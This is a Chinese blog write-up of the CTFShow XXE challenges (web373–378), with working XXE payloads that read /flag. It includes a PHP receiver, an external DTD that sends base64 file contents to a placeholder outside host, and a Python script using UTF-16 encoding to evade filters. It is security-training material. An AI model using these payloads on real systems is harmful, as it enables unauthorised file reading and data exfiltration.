CTFShow XXE

最新推荐文章于 2024-07-18 10:04:05 发布
最新推荐文章于 2024-07-18 10:04:05 发布
阅读量1.8k 收藏 2
点赞数 2
分类专栏: CTFShow刷题篇 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49656607/article/details/119926513
版权

前言

XXE 的漏洞在我的上一篇文章有讲过,这里就不多说,直接看题
XXE外部实体注入

web373

在这里插入图片描述
有回显的文件读取

<?xml version="1.0"?>
<!DOCTYPE xml [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<paidx0>
<ctfshow>&xxe;</ctfshow>
</paidx0>

在这里插入图片描述

web374~376

在这里插入图片描述
无回显的文件读取,禁用了版本号,问题不大不写版本号就是了

在公网上构造以下几个文件

   x.php
<?php
$content = $_GET['1'];
if(isset($content)){
    file_put_contents('flag.txt','更新时间:'.date("Y-m-d H:i:s")."\n".$content);
}else{
    echo 'no data input';
}

   xxe.xml
<!ENTITY % all
"<!ENTITY &#x25; send SYSTEM 'http://xxx.xxx.xxx.xxx/x.php?1=%file;'"
>
%all;

构造 payload


<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % remote SYSTEM "http://xxx.xxx.xxx.xxx/xxe.xml">
%remote;
%send;
]>

简单解释一下,就是通过引用实体的顺序来实现数据外带,最后将文件写入到 flag.txt 里面
在这里插入图片描述
在这里插入图片描述

web377

在这里插入图片描述
多过滤了 http 头,利用 utf-16 编码

import requests
url = 'http://31bfa099-0c5c-4d78-9477-6a6513953714.challenge.ctf.show:8080/'
payload = '''
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % remote SYSTEM "http://xxx.xxx.xxx.xxx/xxe.xml">
%remote;
%send;
]>
'''
payload = payload.encode('utf-16')
rep = requests.post(url=url, data=payload)
print(rep.text)

在这里插入图片描述

web378

在这里插入图片描述
在这里插入图片描述
登录框抓个包,发现是回显xml 形式,而且是回显 username的值

payload

<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY file SYSTEM "file:///flag">
]>
<user>
<username>&file;</username>
<password>123</password>
</user>

username 值被替换
在这里插入图片描述

总结

XXE 的题就暂时告一段落了,XXE和 SQL注入用法类似,而且危害也很大,可以信息泄露,DOS攻击,内网探测等等。

也是研究了几天才搞明白,其实数据外带也是有模板的,就像 SQL注入 时的构造语句一样,弄明白就不难了

paidx0
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 5
    评论
专栏目录
ctfshow XXE
lwbcsd的博客
04-03 4561
xxe web373 有回显 函数介绍 libxml_disable_entity_loader #禁用/启用加载外部实体的功能 参数为true时为禁用,参数为false为启用 file_get_contents('php://input') #简单理解就是接受POST请求方式传的数据 loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD) #通过解析一个 XML 标签字符串来组成该文档 simplexml_import_dom #把 DOM 节点
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
XXE的学习记录以及ctfshow_XXE模块练习
RealIiikun的博客
05-24 582
XXE(XML External Entity)即XML外部实体攻击。DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。DTD 可以在 XML 文档内声明,也可以外部引用。1,内部声明: ex:> <!!!!!!> <
ctfshow xxe
m0_74940843的博客
11-16 196
XXE全称为XML External Entity Injection即XMl外部实体注入漏洞1.XXE简介 XXE就是XML外部实体注入,当允许引用外部实体时, XML数据在传输中有可能会被不法分子被修改,如果服务器执行被恶意插入的代码,就可以实现攻击的目的攻击者可以通过构造恶意内容,就可能导致任意文件读取,系统命令执行,内网端口探测,攻击内网网站等危害。 那有的小伙伴可能就会问了,那XML又是什么呢?2.XML概念 XML是可扩展的标记语言(eXtensible Markup Language),设
初识XXE漏洞及ctfshow做题(373-378)
最新发布
m0_74402888的博客
07-18 732
XXE就是XML外部实体注入,当允许引用外部实体时, XML数据在传输中有可能会被不法分子被修改,如果服务器执行被恶意插入的代码,就可以实现攻击的目的攻击者可以通过构造恶意内容,就可能导致任意文件读取,系统命令执行,内网端口探测,攻击内网网站等危害。// 注意:由于file_get_contents('php://input')在失败时会返回false或空字符串,ELEMENT foo ANY > <!// 使用file_get_contents函数从'php://input'流中读取原始POST数据。
CTFSHOW-XXE
m0_74456293的博客
06-03 488
CTFSHOW-XXE
ctfshow—XXE
cosmoslin的博客
10-24 1027
XXE XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml_load 默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。 XXE可导致读取任意文件,探测内网端口,攻击内网网站,发起拒绝服务攻击,执行系统命令等。Java中的XXE支持sun.net.www.p
XXE - 防御策略-01
09-15
XXE 防御策略 XXE(Xml External Entity)漏洞是一种常见的 XML 解析漏洞,攻击者可以通过构造恶意 XML 文档来读取敏感信息或执行系统命令。为了防御 XXE 漏洞,需要了解其成因和防御策略。 一、XXE 漏洞消亡原因 ...
5、XXE漏洞pdf资料
10-15
XXE(XML External Entity)漏洞是针对XML解析器的安全漏洞,它发生在XML解析器处理包含外部实体引用的恶意XML输入时。XML(eXtensible Markup Language)是一种用于存储和传输数据的标记语言,它的主要特点是允许...
XXE超详细讲解 全网仅此一份
07-06
XXE(XML External Entity injection)是一种安全漏洞,它发生在解析XML输入时,由于应用程序未能正确处理外部实体,攻击者能够注入恶意的XML实体,从而读取服务器上的敏感文件、执行系统命令或探测内网资源。...
Blackhat USA 2015 XXE
12-25
### Blackhat USA 2015 XXE:深入解析与防范策略 #### 一、背景介绍 在2015年的Blackhat大会上,由Xiaoran Wang与Sergey Gorbaty共同发表了一篇关于XML外部实体(XXE)攻击的研究报告——《FileCry—The New Age ...
ctfshow-XXE(web373-web378)
m0_72125469的博客
03-11 1159
ctfshow web373 web374 web375 web376 web377 web378
CTFshow_Web_XXE——web373~377
Ho1aAs‘s Blog
05-07 2368
文章目录参考文章题解web373web374~376web377完 参考文章 一篇文章带你深入理解漏洞之 XXE 漏洞 未知攻焉知防——XXE漏洞攻防 题解 web373 常规XXE flag的路径是/flag // 允许加载外部实体 libxml_disable_entity_loader(false); // xml文件来源于数据流 $xmlfile = file_get_contents('php://input'); if(isset($xmlfile)){ $dom = new DOMDo
CTFshow XXE
starttv的博客
11-10 539
为区分嵌套实体和实体之间的关系,可以通过单双引号来间隔开,引号中嵌套一个参数实体,其%号需要写成:%也可写为16进制的%(1)使用 % 实体名(这里面空格不能少) 在 DTD 中定义,并且只能在 DTD 中使用 %实体名;用bp抓包,可以发现传的内容是xml,并且在username处有回显,直接xxe。引用的实体,他在DTD 中定义,在 XML 文档中引用。(2)只有在 DTD 文件中,参数实体的声明才能引用其他实体。发现了过滤,用空格绕过一下就可以了,步骤和上题一样。过滤了大小写,还是用空格绕过。
ctfshow web入门 XXE
2301_79442654的博客
03-30 737
XXE(XML External Entity)攻击是一种针对XML处理漏洞的网络安全攻击手段。攻击者利用应用程序在解析XML输入时的漏洞,构造恶意的XML数据,进而实现各种恶意目的。所以要学习xxe就需要了解xml。
DTD(文档类型定义)介绍
qq_40321119的博客
10-18 2416
DTD简介 DTD中文意思是:文档类型定义,主要用来定义合法的文档结构(包括XML和HTML);可以声明在文档中,也可以作为外部的引用。 内部DTD声明 <?xml version="1.0"?> <!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)> ...
ctfshow-XXE(web373-web378)_ctfshow373
2401_84971538的博客
05-12 603
能编码简单理解就是(我的理解)input获取到数据后 先绕过正则 然后在操作xml的时候这个对象就能识别出是xml 因为xml支持utf-16 这时哪怕在xml声明编码方式为utf-8这也无所谓 这声明的只是xml内容为utf-8 但是整体过来是utf-16 这个对象是能识别出来的 然后看到这个声明为utf-8后再将内容设为utf-8的编码方式。使用一个不同的方式吧(原理都是一个意思) 为什么要绕一圈呢,就是因为在请求的时候 默认不允许将本地文件发送到dtd文件 间接的影响了我们的请求 所以要套一层。
XXE以及实例
doubirui的博客
03-30 978
其中最常见的一种攻击是利用DTD(Document Type Definition)来读取本地文件,通过将file://协议和可访问的文件路径嵌入到XML中,攻击者可以读取服务器上的敏感文件内容。在 XML 中,CDATA 块是一种特殊的文本块,用于包含任意文本数据,包括标签和特殊字符,而不需要进行转义处理。总结起来,使用 % 的形式是参数实体引用的一种特殊用法,用于引用其他实体。需要注意的是,对于一般的实体引用,如 % 或 %,可以在 XML 文档中的任何位置使用,而不仅限于参数实体引用的定义中。
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值